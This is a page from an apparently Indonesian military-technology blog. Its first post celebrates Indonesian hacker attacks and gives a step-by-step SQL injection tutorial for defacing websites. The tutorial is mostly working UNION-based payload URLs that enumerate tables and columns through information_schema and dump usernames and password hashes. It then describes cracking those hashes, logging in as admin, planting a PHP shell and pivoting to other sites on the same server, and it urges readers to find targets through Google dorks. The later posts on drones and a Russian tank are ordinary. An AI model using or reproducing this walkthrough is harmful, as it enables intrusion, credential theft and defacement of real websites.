Military Technology News Network

SQL INJECTION, METODE SERANGAN YANG BANYAK DI PAKAI TENTARA CYBER INDONESIA

Bercokolnya Indonesia sebagai  top scorer serangan Cyber Dunia tidak pernah diperhitungkan sebelumnya oleh negara-negara di dunia, bahkan negara dibelahan dunia dibuatnya terkaget-kaget siapa sangka serangan cyber Indonesia menjadi sumber serangan dan peretasan Internet nomor satu di dunia pada kuartal kedua tahun 2013 mengalahkan negara-negara besar seperti china, Amerika, Turki, Taiwan dan Rusia.
Contoh Alur Metode Serangan SQL Injection
Meletusnya perang siber antara Indonesia dan Australia pada tahun 2013 menjadi tonggak sejarah pemicu serangan siber besar-besaran terhadap negara Australia, bahkan diklaim menjadi pertempuran terhebat sepanjang sejarah serta terkoordinasi dan termodern bahkan melibatkan para “ellit” (strata tertinggi dalam dunia hacking) sampai para “lamer” (strata terbawah didunia hacking) yang dilancarkan para tentara cyber Indonesia. Sebenarnya Indonesia sudah pernah terlibat perang siber sejak tahun 1999 mulai dari perang siber terhadap Portugal, Australia, serta malaysia dan terakhir Indonesia terlibat kembali cyberwar dengan Australia setalah di picu masalah aksi mata-mata Intelijen Australia terhadap Presiden Indonesia pada tahun 2013. 

Contoh listing SQL Injection Ketika memasuki form
Berbicara masalah persenjataan para hacker Indonesia pun beragam mulai dari terbanyak di pakai adalah SQL Injection kemudian Ddos dan terakhir Bootnet  dari kesekian banyak motif serangan tersebut yang paling lucu adalah hanya dilakukan oleh para anak anak pelajar SMA atau Kuliahan yang dikerjakan di warnet-warnet, komputer personal bahkan leptop-leptop pinjaman .

Nah.. kali ini kita akan mencoba mengulas serangan menggunakan SQL Injection yang digunakan untuk meretes halaman website atau kata lain dari deface.

Penggunaan teknik SQL Injection dalam proses mendeface sebuah website masih populer di kalangan peretas website. Hal ini karena banyaknya programmer yang lalai menaruh perhatian terhadap serangan SQL Injection. Serangan SQL Injection merupakan serangan deface yang sangat halus sehingga seorang administrator website tidak akan sadar jika ada seseorang yang telah masuk dan mengambil alih kontrol administrator suatu aplikasi berbasis website

Apa itu SQL Injection ?
Secara harfifah SQL Injection adalah salah satu jenis penyerangan yang mengizinkan user tidak sah (penyerang) untuk mengakses database server. Pada dasarnya, serangan ini difasilitasi oleh kode program itu sendiri. Tekniknya, penyerang mencoba memasukan query (melalui field atau URL) yang akan menyebabkan database serber menggenerate query SQL yang tidak valid.

Bagaimana Cara Kerjanya ?
Cara kerjanya adalah memasukan query SQL atau perintah (command) sebagai input yang dimungkinkan melalui halaman web. Dimana halaman web mengambil parameter dari user, lalu membuat query sql ke dalam database. Salah satunya adalah pada halaman login user, dimana pada halaman web akan membuat query sql ke database untuk memeriksa username dan password yang tepat.

Apa yang diperlukan ?
Untuk keperluan SQL Injection kita hanya membutuhkan browser. Browser yang dipakai adalah segala macam browser.
 
Apa yang perlu di cari ?
Kita dapat memanfaatkan halaman-halaman web yang terdapat submit data , contoh: halaman login, pencarian, feedback, dan lain-lain. Kadang halaman HTML menggunakan metode POST untuk mengirim parameter ke halaman web yang lain. Jika model halamnnya seperti ini maka kita harus melihat source code karena kita tidak dapat melihat pada URL.

Hal yang harus di ketahui sebelum melakukan serangan 
Yang perlu di ketahui sebelum sql injection pada mysql :
karakter: ' atau –
comments: /* atau –
information_schema untuk versi: mysql versi 5.x
( tidak support untuk mysql versi 4.x )

 

CONTOH SIMULASI SERANGAN BY INDONESIAN CYBER COMMUNITY 

1. Cari Target + Bugnya
Cara mencarinya adalah dengan dork sql injection. Misalnya inurl:”index.php?id=” search dengan GOOGLE, misalkan kita mendapatkan alamat situs

http://www.target.com/index.php?id=4

Lalu untuk mengetahui suatu web memiliki bug SQL injection, tambahkan sebuah tanda petik pada akhir url, sehingga urlnya menjadi

http://www.target.com/index.php?id=4’

lalu tekan enter dan apa yang terjadi pada situs tersebut? Situsnya menampilkan pesan error, berarti parameter id tidak di filter dengan baik atau bahkan tidak difilter sama sekali. Untuk mengetahui suatu web aplikasi memiliki bug SQL Injection salah satunya adalah menggunakan perintah and+1=1--
 
Ketika di tambahkan parameter +and+1=1-- pada akhir URL, situsnya tampil dengan normal karena 1=1 menghasilkan nilai true.
 
http://www.target.com/index.php?id=4+and+1=1--
Dan ketika di tambahkan parameter +and+1=2-- isi berita tidak dapat ditampilkan karena 1=2 hasilnya false dan ini membuktikan bahwa web aplikasi tersebut  99.9% memiliki bug SQL Injection
http://www.target.com/index.php?id=4+and+1=2--



2. Cari Column Yang Memiliki Celah Injection
Setelah saya tau bahwa web tersebut memiliki Bug SQL Injection saya harus mencari tau nama table dan column, tapi sebelum itu saya harus mencari tau pada column ke berapa saya bisa melakukan Injection, untuk itu saya menggunakan perintah +order+by+ perhatikan url berikut.

http://www.target.com/index.php?id=4+order+by+1--
http://www.target.com/index.php?id=4+order+by+2--
http://www.target.com/index.php?id=4+order+by+3--
http://www.target.com/index.php?id=4+order+by+4--
http://www.target.com/index.php?id=4+order+by+5--
url diatas jika di coba satu persatu akan menampilkan situsnya secara normal. Tapi ketika diinput dengan order+by+6-- apa yang terjadi??? Browser menampilkan pesan error. Dari pesan error tersebut bisa dipastikan terdapat 5 buah column yang terdapat disalah satu table yang belum kita ketahui namanya. Berarti yang kita ambil sampai +order+by+5-- saja.


3.Gunakan Perintah Union Select
Setelah mengetahui terdapat 5 buah column pada target, selanjutnya yaitu mencari column yang bisa dilakukan injeksi. Untuk itu saya menggunakan perintah +union+select+ sehingga urlnya menjadi :

http://www.target.com/index.php?id=4+union+select+1,2,3,4,5--

Dan apa yang tampak di browser tidak ada yang aneh bukan? situsnya tampil dengan normal. Tetapi jika parameter id saya ganti menjadi -4 yang pastinya tidak ada isi data -4 di Database.
 

http://www.target.com/index.php?id=-4+union+select+1,2,3,4,5--

Oke disini browser menampilkan angka 2 & 3, dan angka inilah yang sering disebut dengan angka ajaib, karena angka tersebut adalah letak column dimana attacker bisa melakukan injeksi lebih lanjut.

4.Cari informasi Database Target
Dengan tampilnya angka ajaib tersebut anda bisa 'mengintip' beberapa informasi seperti nama database, nama user database, versi database, sessi user dll. Untuk melihat nama database, injeksi urlnya menjadi

http://www.target.com/index.php?id=-4+union+select+1,database(),3,4,5--

Dan disini browser menampilkan nama database yaitu xyb_injector. Saya mencoba mengintip lagi nama user database pada situs tersebut dengan menginjeksinya pada column ke-2 dan versi pada column ke-3 dan url injeksinya menjadi :
 
http://www.target.com/index.php?id=-4+union+select+1,user(),version(),4,5--

 
Ternyata user dabasenya root@localhost dan beruntung sekali karena versi mysql yang di gunakan adalah versi 5.0.51a-community, lho emang kenapa kalo versi 5??? Karena bisa dilanjutin bacanya :D, kalo misalkan versi 4 tinggalin aja deh, cari target baru, hahahaha ?.

Coba anda perhatikan, anda hanya bisa meng-injeksi satu perintah pada satu column. Bisakah meng-injeksi lebih dari satu perintah pada satu colums??? Heheheh tentu saja bisa dong, untuk itu anda bisa menggunakan perintah yang sudah disediakan langsung oleh mysql yaitu perintah concat(perintah1,perintah2). Contoh dibawah ini saya meng-intip nama user dan nama database pada column ke-2 dan pada column ke-3 saya mengintip versi databasenya.
 
http://www.target.com/index.php?id=4+union+select+1,concat(user(),0x3a,database())
,version(),4,5--


5. Dapatkan Nama Table
Saya sudah mendapatkan informasi database web tersebut, sebenarnya yang saya butuhkan hanyalah versi databasenya saja, seperti yang sudah anda lihat, versi database yang ditampilkan adalah 5.0.51a-community dan tentu ini memudahkan saya dalam mendapatkan table dengan menggunakan perintah table_name pada column yang memiliki bug yaitu angka 2 atau 3 pada web tersebut. Di akhir statement tambahkan
 
from+information_schema.tables+where+table_schema=
database()+limit+0,1--

Sehingga urlnya menjadi : 
http://www.target.com/index.php?id=4+union+select+1,2,table_name,4,5
+from+information_schema.tables+where+table_schema=
database()+limit+0,1--

Di web tersebut tampil sebuah table bernama "table_attacker". Untuk melihat seluruh table sekaligus gunakan perintah group_concat(table_name) pada column yang memiliki bug, sehingga urlnya menjadi

 
http://www.target.com/index.php?id=4+union+select+1,2,group_concat(table_name),4,5
+from+information_schema.tables+where+table_schema=
database()--


6.Dapatkan Nama Column
table_user sudah saya dapatkan selanjutnya yaitu mencari nama column pada table tersebut, untuk itu saya menggunakan perintah group_concat(column_name) sehingga urlnya menjadi
 
http://www.target.com/index.php?id=4+union+select+1,2,group_concat(column_name),4,5+
from+information_schema.columns+where+table_name=
0xhexa--

pada tahap ini kamu wajib mengextrak kata yang keluar pada isi table tadi menjadi hexadecimal yaitu dengan cara mengkonversinya. Salah satu website yg digunakan untuk konversi :

http://www.string-functions.com/string-hex.aspx


Contoh kata yg ingin di konversi yaitu table_user maka akan menjadi 7461626c655f75736572 ini masih belum selesai, anda harus menambahkan angka 0 dan huruf x pada awal hasil hexa tersebut sehingga hasilnya menjadi 0x7461626c655f75736572 dan inilah yang akan kita injeksikan pada nama tabel. Sehingga urlnya menjadi
 
http://www.target.com/index.php?id=4+union+select+1,2,group_concat(column_name),4,5
+from+information_schema.columns+where+table_name=
0x7461626c655f75736572--<

Alhasil nama column dari table_user sudah saya dapatkan yaitu user_id dan password_id.

7. Dapatkan Usename & Password
Saya sudah mendapatkan nama table “table_user” yang berisi 2 buah column yaitu “user_id” dan “password_id” dan akhirnya anda sudah sampai di detik-detik terakhir yaitu menampilkan isi data dari column tersebut. Tambahkan 0x3a pada group_concat(hasil isi column yg mau dikeluarkan,0x3a, hasil isi column yg mau dikeluarkan) perintah +from+(nama table berasal) à dimasukkan setelah angka terakhir sehingga urlnya menjadi :
 
http://www.target.com/index.php?id=4+union+select+1,2,group_concat(user_id,0x3a,
password_id),4,5+from+table_user--

Tampillah seluruh username dan password dari situs tersebut. Biasanya password yang kita dapat sudah terenkripsi dalam bentuk md5 atau enkripsi yang lainnya. Untuk menterjemahkannya anda bisa mencari website yang menyediakan cracking password atau dengan tool cracking password. Setelah itu anda tinggal mencari halaman log in admin dan masuki sistemnya. Setelah memasuki sistem biasanya hacker menanamkan php shell untuk lebih gampang keluar masuk dan bisa mengexplore isi dari website tersebut terlebih lagi si hacker bisa melakukan teknik jumping sehingga semua website yang berada dalam 1 server yang sama dengan website yang terkena hack tersebut bisa di ambil alih oleh hacker tersebut, berbahaya sekali bukan?

Catatan :
maksud dari penggunaan link www.target.com adalah websitenya cari sendiri dengan memanfaatkan google dengan mencari menggunakan kata kunci tertentu. 

Sumber : 
Berbagai sumber sedangkan contoh simulasi serangan diambil dari Indonesia cyber community

Di Sunting Kembali by:
http://www.momosergeidragunov.com/
Share:

AIRMULE, UAV KARGO & EVAKUASI KORBAN PERANG BUATAN ISRAEL

Kabar teknologi militer terbaru datang dari negara kawasan mediterania, dia adalah negara kecil yang paling disegani bahkan menurut statistik negara ini adalah negara yang paling modern dan mandiri dalam bidang teknologi dikawasan timur tengah, tentu musuhnya juga banyak entah apa yang di perbuatnya sehingga di benci para tetangganya sebut saja Negara Israel. 
Foto Gambar UAV Airmule Israel

Gambar Simulasi UAV Airmule sebagai Evakuasi Korban Perang

Kali ini negara Israel kembali membuat terobosan baru yakni membuat suatu sistem transfortasi menggunakan pesawat tak berawak untuk mengangkut  kargo , evakuasi medis dan membawa bantuan pendukung pertempuran untuk pasukan, dengan sasaran operasional daerah terpencil dan kondisi sulit yang tidak mampu di darati oleh helikopter.
Gambar Prototype tampak depan dan samping Air Mule

Pesawat tak berawak ini diberinama AirMule yang dikembangkan dan dibuat oleh Israel Urban Aeronautics untuk Angkatan bersenjata Israel. Desain dari Airmule ini tergolong unik tidak sama seperti  kendaraan terbang pada umumnya seperti helikopter ataupun Pesawat terbang, kalau dilihat sepintas UAV ini mirip seperti Hovercraft skala kecil bahkan sistem penggeraknya pun hampir sama, hanya saja hovercraft digerakkan Fan/kipas baling baling yang mengalirkan udara melalui air intake ke dalam flexible skirt untuk membatasi gerak udara yang masuk, tetapi berbeda dengan UAV Airmule yang menganut sistem VTOL (Vertikal Take Off & Landing) cara kerjanya sama digerakkan menggunakan kipas baling-baling dengan tekanan udara yang tidak dibatasai sehingga mempunyai gaya angkat yang mampu terbang lebih tinggi ketimbang Hovercraft. 

UAV ini berhasil menyelesaikan ujicoba penerbangan perdana selama satu tahun mulai dari tahun 2009 sampai Januari 2010, Pada ujicoba tersebut terdapat beberapa kekurangan yang harus di benahi  dan direncanakan akan selesai pada tahun 2014.


Sebenarnya Airmule memiliki dua modus sistem penerbangan baik manual ataupun otomatis, untuk kontrol sistem penerbangan manual dikendalikan oleh markas kendali /ground control station (GCS)  lengkap dengan  display kontrol unit kendali penerbangan (Ground Control Unit /GCU) untuk mengarahkan ataupun menampilkan posisi keberadaanya dan memantau data telemetri yang diberikan UAV menggunakan sistem komunikasi Uplink dan Downlink secara realtime. bahkan, saking canggihnya UAV ini mampu mendarat dengan aman meskipun terdapat kesalahan perintah dari GCS . Sedangkan untuk kendali otomatis menggunakan teknologi fly - by-wire system dengan memanfaatkan kemampuan Ineratial Navigation System (INS) dan Global Positioning System (GPS) dalam  menentukan lokasi operasional. 
GCU (Ground Control Unit)
Ground Control Station (GCS)
Mekanisme Distribusi dan Kendali data GCU yang ada pada GCS

Peralatan lain yang dibawa UAV adalah berupa sensor dan radar seperti sensor penglihatan infra merah dan dua sensor laser untuk memantau ketinggian penerbangan (altitude) serta radar aperture sintetis dan ground moving target indicator.


UAV Air Mule memiliki panjang 6 meter dengan lebar 2 meter di dukung oleh Mesin Turboshaft tunggal Arrien 1D1 menghasilkan daya 940 shp berkekuatan 559Kw,  pesawat ini mampu terbang pada kecepatan 185km/jam pada ketinggian maksimum 3.657m, berat saat take off kosong 635kg berat maksimum 1.088kg berdaya tahan maksimum 5 Jam. 



Semakin banyaknya militer yang menggunakan teknologi robotik maka peperangan dimasa mendatang akan jauh lebih efisien dan lebih mematikan. III0III0
Share:

XFC UAS, DRONE EXPERIMENTAL UNTUK KAPAL SELAM NUKLIR AMERIKA

Angkatan Laut Amerika Serikat baru baru ini telah berhasil meluncurkan pesawat mata-mata tak berawak dari sebuah Kapal Selam Nuklir tanpa muncul ke permukaan seperti layaknya peluncuran rudal balistik. Dengan berhasilnya ujicoba ini merupakan suatu terobosan / inovasi  terbaru dalam meningkatkan kemampuan mata-mata militer Amerika Serikat baik dalam hal misi intelijen (intelligence), pengawasan (surveillance)  dan pengintaian (reconnaissance) atau yang biasa disingkat  “ISR”.

Foto Drone XFC UAS(experimental FullCell Unmanned Aerial System)

Pesawat mata-mata tersebut di berinama XFC UAS (eXperimental Fuel Cell  Unmanned Aerial System) dikembangkan oleh US Naval Research Laboratory ( NRL ) bermarkas di Bahama dan di ujicoba pertama kali pada kapal selam nuklir kelas SSN Los Angles. Bahkan NRL mengklaim dalam penyelesaian drone XFC hanya membutuhkan waktu kurang dari enam tahun dengan capaian efisiensi biaya yang signifikan dibandingkan dengan program sebelumnya yang memakan waktu minimal 10 tahun dengan biaya yang tidak sedikit.

Drone XFC di desain menggunakan konfigurasi sayap lipat-X, seperti layaknya rudal pada umumnya hal ini difungsikan untuk mendukung penyebaran udara yang stabil pada saat diluncurkan secara vertikal  pada permukaan yang tidak statis (permukaan air) dan sistem operasinya sepenuhnya Otonomus  sedangkan untuk bahan bakar Drone XFC seluruhnya menggunakan Listrik yang dibangkitkan dari sel membran proton dengan kemampuan beroperasi pada suhu yang relatif rendah berkisar (<80 º C atau <175 º F) dengan mengkombinasikan panas cahaya matahari , Hidrogen dan oksigen. kemudian
dilengkapi dengan Sonar Panel, Radio Detection Finder, GPS Antena dan Kamera pengintai.   Wal hasil, Drone XFC mampu beroperasi secara senyap selama 6 Jam. 

Foto Mekanisme Pelucuran Drone XFC (klik Gambar untuk Memperbesar)

Dalam mekanisme peluncuran Drone XFC dari kapal selam para ilmuan NRL Amerika menggunakan terobosan terbaru yang dikenal sebagai “Sea Robin”. Sistem peluncuran Sea Robin adalah salah satu teknik peluncuran yang sama persis di gunakan Amerika dalam menembakkan rudal jelajah Tomahawk  dari Kapal Selam.

Mekanisme peluncurannya sebagai berikut Drone XFC di muat kedalam sebuah tabung torpedo kosong (Sea Robin) dan di tembakkan dari kapal selam di kedalaman minimal 10 meter, setelah sampai kepermukaan laut sea robin muncul sebagai pelampung Spar yang dilengkapi Electrical Panel. kemudian secara otomatis Sea Robin terbuka barulah  sistem peluncuran elektrik dinyalakan untuk membantu peluncuran vertikal dan segera setelah mencapai kecepatan operasi minimum serta ketinggian yang cukup, barulah sayap terbuka untuk terbang secara horizontal, sedangkan sistem distribusi informasi data yang didapat dari Drone akan langsung ditransfer dan dimonitor melalui Kapal selam. Bahkan pada saat di ujicoba Drone XFC mampu di daratkan pada kapal induk Angkatan Laut Amerika .
Pergerakan Drone Setelah Peluncuran

Dari semua kecanggihan dan Inovasi ini membawa Amerika kepada Top Leader Inovasi teknologi militer dan selangkah lebih maju dari pada musuh bebuyutannya Rusia. III0III0
Share:

BMPT 72 TERMINATOR 2, SEQUEL TERBARU SANG BODY GUARD TANK UTAMA RUSIA

BMPT-72 atau dikenal sebagai Tank Terminator 2 adalah sequel lanjutan dari tank terminator yang resmi di luncurkan pada pameran Industri Pertahanan Russia pada 25 september 2013 bertempat di Nizhny Tagil, Rusia. Pada sequel sebelumnya tank terminator 1 dianggap masih memiliki banyak kekurangan, baik pada proteksi, operasional dan sistem integrasi pertempuran untuk mengatasinya maka dibuatlah Tank terminator 2 dengan mengusung teknologi yang jauh lebih modern dengan memanfaatkan sistem integrasi terkomputerisasi.
Gambar BMPT Terminator 1

Gambar BMPT Terminator 2
Pada desain tank terminator 2, Ilmuan Russia masih tetep mempertahankan chasis dari MBT T-72 karena dianggap masih tak terkalahkan dalam kehandalannya melahap medan baik offroad ataupun beraspal. Sedangkan untuk sistem proteksi baja terjadi peningkatan yang cukup signifikan yakni menggunakan baja explosive reactive armour (ERA) yang menyelimuti semua bagian tank, pada bagian belakang (block mesin) dilengkapi dengan Armored Bar/Slats, sedangkan pada bagian menara atau peluncur rudal dilindungi dengan armored panel. Perubahan lain juga terjadi yakni pengurangan kru dalam mengoperasikan tank terminator yang sebelumnya di operasikan paling sedikit 5 orang kru, tapi untuk mengoperasikan tank terminator terbaru cukup dengan 3 orang kru dengan mengintegrasikannya secara terkomputerisasi kedalam suatu management combat system.

Tidak ketinggalan beberapa sensor penglihatan untuk memaksimalkan daya tempurnnya diantaranya Penembak dan Komandan dilengkapi dengan Panel kontrol dan layar LCD Thermal Multi channel yang terdiri dari Laser Range Finder, Guided Missile Control dan Independent Fov (Field or View) ditambah lagi dengan sensor Advanced Automatic Fire Control System, Balistic System, Navigasi Glonass dan Pemindai Geografis untuk menentukan sudut elevasi tembakan. Dengan daya deteksi yang mampuni Terminator 2 bisa mengendus dan membinasakan keberadaan musuh secara akurat pada jarak 5000m

Sistem Persenjataan BMPT Terminator 2

Berbicara mengenai persenjataan Terminator 2 dirancang untuk mampu membinasakan berbagai target darat maupun udara walaupun persenjataan yang di usung terdapat pengurangan. namun, tidak mengurangi kesangaran dari tank terminator terbaru ini, bayangkan saja terminator mampu di turunkan lebih taktis dan efisien dengan dua meriam mematikan 2A42 caliber 30mm terdiri dari amunisi  High Explosive-Tracer (HE-T), Armour-piercing discarding sabot (APDS), High Explosive Fragmentation (HE-FRAG) and Armor-Piercing - Tracer (AP-T) dengan membawa total 850 amunisi, dua peluncur rudal anti tank yang bertotal 4 rudal ATGM Ataka 9m120 yang terletak pada sisi kanan dan kiri digunakan untuk membinasakan pasukan tank kaveleri musuh dan helikopter hingga jarak maksimum 6000m. Selain itu untuk senjata sekundernya tank terminator 2 mengusung senapan mesin otomatis kaliber 7.62mm kemudian ditambah peluncur geranat asap caliber 81mm untuk menghindari sergapan dan bidikan musuh. 
Klik Untuk Memperbesar Foto

Klik untuk memperbesar Foto

 


Dengan mengefisienkan peralatan canggih yang di usung, Terminator 2 hanya berbobot 44 Ton lebih ringan 3ton dari tank terminator pendahulunya yang berbobot 47T, tank terminator 2 mengusung mesin diesel turbocharged liquid-cooled 12 silinder menghasilkan daya 1000hp dan kalau di geber terminator 2 mampu melesat dengan 60km/jam dengan jarak tempuh 500 km Kendaraan ini juga dilengkapi dengan unit daya tambahan untuk menunjang misi pertempuran serta daya jangkaunya  dan Snorkel untuk menyelam dengan kedalaman 5 meter. Ups Lupa, Tank Terminator 2 dilengkapi dengan Sensor deteksi radiasi Nuklir (NBC). III0III0

Baca Juga :
Tank Terminator 1 edisi sebelumnya  

Share:

Popular Posts

MOMOSERGEIDRAGUNOV

Pages

Military

Name*


Message*